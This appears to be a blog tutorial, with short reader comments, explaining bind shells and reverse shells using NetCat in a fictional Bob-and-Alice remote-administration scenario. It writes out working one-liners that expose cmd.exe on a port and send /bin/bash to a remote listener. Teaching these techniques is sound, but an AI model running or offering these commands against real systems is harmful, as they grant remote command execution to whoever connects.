BIND SHELL 
There are a number of ways that you can bind your shell to a port. We will use NetCat to bind a shell.
We can take cmd.exe and bind it to a local port, and anyone connecting to this port will be presented with a command prompt belonging to that computer. This is known as a BIND SHELL.
Scenario 1 :-
As always, the two fictional characters Bob and Alice are trying to connect to each other.
Suppose, Bob is running a Windows machine, and has a public IP, through which he directly connects to the internet. Bob needs Alice's assistance to help him out (basically perform Remote Administration).
Alice, running a Linux machine, however has a NAT connection, and a non-routable IP Address.
So, in order for this to complete, Bob needs to bind his cmd.exe process to a TCP port on his machine
and inform Alice what port to connect to. This can be achieved using NetCat.
Bob will have to execute the following commands using NetCat on his machine :-
$ nc -lvp 4444 -e cmd.exe
-lvp -> listen verbosly on foll port
-e -> bind NetCat to the subsequent process.
This command makes available the cmd.exe process over port 4444 and redirects all the stdout, stdin and stderr to that port.
Alice can now connect to this IP and port from her machine, using NetCat.
$ nc -v 192.168.0.111 4444
Alice will immediately get a windows cmd prompt from where she can manage Bob's machine, depending on the privileges.
REVERSE SHELL
Scenario 2 :-
This is a reverse of scenario 1. Now suppose Alice needs Bob's assistance.
Again as before, Alice has a NAT connection to the internet, and Bob has a public IP. So, Bob cannot directly connect to Alice's computer.
Now Alice can send her command prompt to Bob's machine. As far as network traffic is concerned, Alice will be connecting to Bob's machine.
In this scenario, rather than Alice connecting to Bob's command shell, Alice will be sending her command shell to Bob.
Bob will first start a listener on a given port using NetCat :-
$ nc -lvp 4444
Now Alice will be sending her command prompt over to Bob's machine, again using NC.
This situation is different, because we'll be sending Linux shell rather than a Windows cmd prompt.
So, rather than binding cmd.exe, we'll be binding the bash shell.
$ nc -v 192.168.0.111 4444 -e /bin/bash
After this command the NC listener on Bob's machine will recieve the Linux shell from Alice.
Bob can now execute bash commands on Alice's machine.
 
great !!! nice one
ReplyDeletenice
ReplyDeleteFantastic post! *****
ReplyDelete